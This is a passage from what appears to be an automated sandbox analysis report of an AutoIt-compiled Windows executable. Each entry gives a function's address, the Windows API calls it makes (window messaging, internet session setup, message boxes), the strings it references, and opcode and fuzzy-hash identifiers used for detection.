                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
                                                                    • Instruction ID: 33655c99404f258b811704e8d1d04bd6a139038cb1dd7a15d4fb7163d94ccf8c
                                                                    • Opcode Fuzzy Hash: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
                                                                    • Instruction Fuzzy Hash: 6011B6723041087FEF119E54DC85EBB376EEB99364F10C528F52CA7291D6319D51A760
                                                                    Function 00973710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                      • Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
                                                                      • Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0097377A
                                                                    • GetSysColor.USER32(00000012), ref: 00973794
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
                                                                    • Instruction ID: 7ee0e9aae89f8c8b732e3312f9f44bc9e96d133dddc713b9d898c5bb5df0f2b5
                                                                    • Opcode Fuzzy Hash: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
                                                                    • Instruction Fuzzy Hash: 781129B2610209AFDB00DFA8CC46EEA7BB8FB09354F008918F959E2250E735E851AB50
                                                                    Function 0095CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095CD7D
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0095CDA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
                                                                    • Instruction ID: f7aa57339800a4275453c02eeff1886c853b9b027bac7691cdfce34228af7d54
                                                                    • Opcode Fuzzy Hash: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
                                                                    • Instruction Fuzzy Hash: 4611A3F22157357ED7288A678C45FE7BEBCEB127A5F00462AB909D20C0D6649848D7F0
                                                                    Function 00973429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 009734AB
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009734BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
                                                                    • Instruction ID: 9d694a802690189f7c8c47e1de1d2ae4a717ea5cd0bb424519ac0727c6dbdbaf
                                                                    • Opcode Fuzzy Hash: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
                                                                    • Instruction Fuzzy Hash: 5E11BF72110108ABEB154F64DC84AAB376EEB55378F50C724FA68931E0C731DC91A750
                                                                    Function 00946C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00946CB6
                                                                    • _wcslen.LIBCMT ref: 00946CC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: STOP
                                                                    • API String ID: 1256254125-2411985666
                                                                    • Opcode ID: df83cde484df009e9f9eff6b6ad5f5d6c324fa9fbe69a5a262efb4c123aeb6e9
                                                                    • Instruction ID: 5d864e1e6771a6bc704d3112a46e84455ed6554b4c36e18f6e5dded219fa167e
                                                                    • Opcode Fuzzy Hash: df83cde484df009e9f9eff6b6ad5f5d6c324fa9fbe69a5a262efb4c123aeb6e9
                                                                    • Instruction Fuzzy Hash: 3F01C072A105278ACB20AFBDDC80DBF77A9FF627187510938E9A2961D0EB31DD40C652
                                                                    Function 00941CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00941D4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: d8ab0f13537a0a201814c53bcc52838584882dc7a5646d4c3740f66495f24684
                                                                    • Instruction ID: a0ec848224502dc1f665e2e2cacf8fabc72852782b1caea7b02caffe6642fd07
                                                                    • Opcode Fuzzy Hash: d8ab0f13537a0a201814c53bcc52838584882dc7a5646d4c3740f66495f24684
                                                                    • Instruction Fuzzy Hash: AB01D8B1A41214AB8B18FFA4CC51DFE7368FB47350B140A19F862972D1EA7059488661
                                                                    Function 00941BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00941C46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 829f393369aa152e0b91e86d1ee19751c518d9f5f3d77452191b23432963960e
                                                                    • Instruction ID: da48cc0bcd4bf2efa5a008c8ec055e667ff16aab2188bbf360c7136251e599ba
                                                                    • Opcode Fuzzy Hash: 829f393369aa152e0b91e86d1ee19751c518d9f5f3d77452191b23432963960e
                                                                    • Instruction Fuzzy Hash: 3C01A77578111867CB18FBA4CD92EFF77ACEB52341F140419E886A7281EA649F48C6B2
                                                                    Function 00941C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00941CC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 0a6080373302c317f468df9dbe42f988b6fc985282c346a1742b9469ad77e41b
                                                                    • Instruction ID: 87068d18fe16c69a111eeaa11afd354a2eeab63989dc265aa6871f2ceacb8907
                                                                    • Opcode Fuzzy Hash: 0a6080373302c317f468df9dbe42f988b6fc985282c346a1742b9469ad77e41b
                                                                    • Instruction Fuzzy Hash: E901D6B179011867CB14FBA5CE91EFE73ACAB12341F540419BC82B3281FA609F48C6B2
                                                                    Function 00941D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00941DD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: ffc8a816e6e84690f5e372392cb809fed60e8ded62b030d34cda5a938643bdf1
                                                                    • Instruction ID: 714184f2bade47b9b643e7f5f6fd796d06123c14f64bdfe1bc6c793276b9a935
                                                                    • Opcode Fuzzy Hash: ffc8a816e6e84690f5e372392cb809fed60e8ded62b030d34cda5a938643bdf1
                                                                    • Instruction Fuzzy Hash: CEF0A4B1F5121466DB14F7A9CC92FFE776CFB42350F540D19F862A32C1EAA05A4882A1
                                                                    Function 0096747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: 3, 3, 16, 1
                                                                    • API String ID: 176396367-3042988571
                                                                    • Opcode ID: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
                                                                    • Instruction ID: 70eb26b633ca3eda494f64afb3339bbb43c4610a60050b2bf3a28065de0911e5
                                                                    • Opcode Fuzzy Hash: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
                                                                    • Instruction Fuzzy Hash: 14E02B4220522014D23112BAACC5B7FD68ECFC5F90710183BFE81C22BAEE948D9193A1
                                                                    Function 00940B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00940B23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 2030045667-4017498283
                                                                    • Opcode ID: ac3801bb8f992d23ac3fe2d3eba4f4e036129e272f2311792ec034251a2a04ed
                                                                    • Instruction ID: b9d84d7a6bb80fead54510ae23419fbd2ed667e62fc21a9e55d91ad0cf092697
                                                                    • Opcode Fuzzy Hash: ac3801bb8f992d23ac3fe2d3eba4f4e036129e272f2311792ec034251a2a04ed
                                                                    • Instruction Fuzzy Hash: 7AE0D8733443082AD21436587C03F897A84DF45B54F10442EF78CD94C38AE1249006EA
                                                                    Function 00900D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00900D71,?,?,?,008E100A), ref: 008FF7CE
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 00900D75
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 00900D84
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00900D7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 55579361-631824599
                                                                    • Opcode ID: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
                                                                    • Instruction ID: 19a1d949961e509047e756cf31c3a044eb965aab9b8ce41590551346caeb41e7
                                                                    • Opcode Fuzzy Hash: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
                                                                    • Instruction Fuzzy Hash: 2AE06DB12007418FD7309FB8E8043467BE4BF40744F00892DE49AC6692EBB0E4888BA2
                                                                    Function 0093D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: %.3d$X64
                                                                    • API String ID: 481472006-1077770165
                                                                    • Opcode ID: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
                                                                    • Instruction ID: 519608edb77107da452723280d53968071e97ae755539fa458becd72c00c65c6
                                                                    • Opcode Fuzzy Hash: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
                                                                    • Instruction Fuzzy Hash: 1DD012A280A10CE9CB9096E0EC558BBB37CFB48301F608852FA26D1041DA38D548AF62
                                                                    Function 00972322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097232C
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0097233F
                                                                      • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
                                                                    • Instruction ID: be4a1eaddaf32935ac970b04a8f08abf6083f6c34c9bddb4a49a0682c0bc37fb
                                                                    • Opcode Fuzzy Hash: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
                                                                    • Instruction Fuzzy Hash: 92D012773A8310B7E764B770DC4FFC67A14AB40B14F01491EB749AA1D0C9F0A841DA54
                                                                    Function 00972356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097236C
                                                                    • PostMessageW.USER32(00000000), ref: 00972373
                                                                      • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
                                                                    • Instruction ID: 54f39d3020dc268e137434a00d948b016fd43724d59caa25d004a7240a7281f0
                                                                    • Opcode Fuzzy Hash: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
                                                                    • Instruction Fuzzy Hash: 47D0C9723A9310BAE664A7709C4FFC66614AB45B14F01491AB649AA1D0C9A0A8419A58
                                                                    Function 0091BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0091BE93
                                                                    • GetLastError.KERNEL32 ref: 0091BEA1
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091BEFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
                                                                    • Instruction ID: b4e0f1f721fed9c94975dd1900cd8bf655570e44c4ecf94c663e49ed0cee0fdf
                                                                    • Opcode Fuzzy Hash: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
                                                                    • Instruction Fuzzy Hash: 2C41EA3570420AAFCF21AF65CC54BFA7BAAEF41720F144169F959972E1DB308D82DB90